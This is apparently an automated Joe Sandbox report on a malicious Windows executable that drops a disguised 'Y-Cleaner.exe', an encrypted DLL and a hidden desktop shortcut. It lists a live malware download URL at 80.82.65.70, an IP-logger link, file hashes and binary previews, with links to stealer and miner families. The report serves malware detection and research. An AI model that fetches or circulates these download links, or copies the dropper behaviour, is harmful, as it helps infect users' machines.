                    http://80.82.65.70/files/downloadAfile.exe, 00000000.00000003.2348586840.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278951429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177695889.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313770429.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253670934.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228425864.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127385618.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.000000000546D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.000000000546D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://iplogger.org/1Pz8p7file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      80.82.65.70
                      		unknownNetherlands
                      		202425INT-NETWORKSCfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1574319
                      Start date and time:2024-12-13 08:34:27 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 51s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.evad.winEXE@2/15@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.42.73.29, 4.175.87.197, 13.107.246.63, 20.12.23.50, 20.190.177.22
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:35:53API Interceptor485821x Sleep call for process: file.exe modified
                      02:36:56API Interceptor1x Sleep call for process: WerFault.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      80.82.65.706gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/name
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70/soft/download
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70/soft/download

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      INT-NETWORKSC6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                      • 80.82.65.70
                      file.exeGet hashmaliciousUnknownBrowse
                      • 80.82.65.70

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]file.exeGet hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                file.exeGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_fafd47531ab6d510499988ddace487f076f293_c8b7b6aa_c05b36dd-8b5d-4457-8f5d-16c063c05959\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9700866335146597
                                          Encrypted:false
                                          SSDEEP:192:Vu9mX+vvZPiA0u1mqI3judvszuiFJiZ24IO8TVBV:Axou1m5jPzuiFJiY4IO8X
                                          MD5:E83898C8E458EC9E8E993239517C9979
                                          SHA1:304B023B3064B90437FF3ED57CFB0512ACF1B893
                                          SHA-256:02BFE5D58A55A40D8F5AE085E537C827FBBC7544F1CD437E597406C70E8CCDC9
                                          SHA-512:655B69AF385D1193D27A0CAD0F8B0A39F6A6FDFACCB1171B751461FE507EBC85A648006DB362302DC255C22F0EDB2B76E91451B337340F09E2C72D2A3A8DAB28
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.4.8.9.9.5.9.0.0.4.9.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.4.8.9.9.6.6.8.1.7.5.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.5.b.3.6.d.d.-.8.b.5.d.-.4.4.5.7.-.8.f.5.d.-.1.6.c.0.6.3.c.0.5.9.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.b.2.5.7.c.c.-.d.f.5.9.-.4.d.a.2.-.a.d.d.f.-.a.1.5.7.b.c.c.d.a.e.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.c.-.0.0.0.1.-.0.0.1.4.-.d.4.4.7.-.7.e.9.1.3.1.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.1.4.9.7.9.f.a.6.0.7.e.3.8.d.2.7.9.0.5.b.1.f.1.5.1.f.1.c.2.5.8.0.0.0.0.1.5.0.6.!.0.0.0.0.6.a.b.b.6.1.1.2.d.7.b.c.e.e.3.f.5.c.a.9.8.3.7.a.d.3.f.0.a.0.0.1.6.2.6.7.f.c.6.3.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER55DA.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 07:36:36 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):46364
                                          Entropy (8bit):2.5496104297496887
                                          Encrypted:false
                                          SSDEEP:384:nyOrqUX5jht16YfGr/RVEw2NkOiOogbTS/L/ziXkf4/:ystJjD1nfGTRVEdEg/SLGb
                                          MD5:40B938D311E006E481A64FD10A1654BB
                                          SHA1:9CDCE774157C676D4F047E01A28432138F39E85F
                                          SHA-256:5EFC3B18CF1DDF93730615B0E8C35748C240CF3F59CDCAF74F399453A35BB322
                                          SHA-512:11D31648F834B75E0C2E442AA2E2B3040854B8B02019C34CAE07E576D3AD8B3AEB8A8ED5DC5B95FB8CD27491FBE3E4918955EC2A163C26A65B8988DB60521002
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... .........[g............4...........8...<.......t....,..........T.......8...........T...........(B...r..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.............[g....!........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5704.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8298
                                          Entropy (8bit):3.695362519892794
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJV4CU6E6Y9WSUUCgmfBGW6pD+89bIRisfc4m:R6lXJVc6E6YMSURgmfZgIRhfC
                                          MD5:BCDEDB04A3BB0DD20D38F131381C8B1E
                                          SHA1:A224A6BBC66DCCE9A8BC76201E593ADC3BB2B703
                                          SHA-256:52134921C2EB3AA9A622F61CA52DD39227E68421A0CDBC8E55D3B6A98F5AA738
                                          SHA-512:795117A0086E385778F462FB4BFBF5CA7681CA3230277E6892F2D7FE4C6C9FA34B164A0B48250DAD028E4D6FE514CA2BC9FE465E8E7A3B01E7EAC2A44F4AA40E
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.4.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER582E.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4541
                                          Entropy (8bit):4.428840149865463
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsmJg77aI9NiWpW8VY5Ym8M4JBRFme+q82Vk1Z+wd:uIjf8I7nj7VdJoe1g+wd
                                          MD5:E32310D077F2A8F803EB46C5B66D4540
                                          SHA1:994C2F8232EE22C0C07906CBAE8EFA43917D7D6E
                                          SHA-256:E7EAEF9AE47101D3E59A0C538F11BEB4891C68B73BBC84BA5D892F19E4D2DE48
                                          SHA-512:8D99986C133CBD09B00BD1995FCF71EE1FFF0AFE5C558A4FD7EE24B911B0F192C3B618282659FCD5C3D41B2342AA09853ECD0678C43A04A833971B285A09DABE
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629199" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:0

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Reputation:high, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):97296
                                          Entropy (8bit):7.9982317718947025
                                          Encrypted:true
                                          SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                          MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                          SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                          SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                          SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                          Malicious:false
                                          Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\download[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\key[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):21
                                          Entropy (8bit):3.880179922675737
                                          Encrypted:false
                                          SSDEEP:3:gFsR0GOWW:gyRhI
                                          MD5:408E94319D97609B8E768415873D5A14
                                          SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                          SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                          SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                          Malicious:false
                                          Preview:9tKiK3bsYm4fMuK47Pk3s

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                          C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                          C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                          C:\Users\user\Desktop\Cleaner.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 06:36:34 2024, mtime=Fri Dec 13 06:36:34 2024, atime=Fri Dec 13 06:36:34 2024, length=1502720, window=hide
                                          Category:dropped
                                          Size (bytes):2205
                                          Entropy (8bit):3.9090856141323505
                                          Encrypted:false
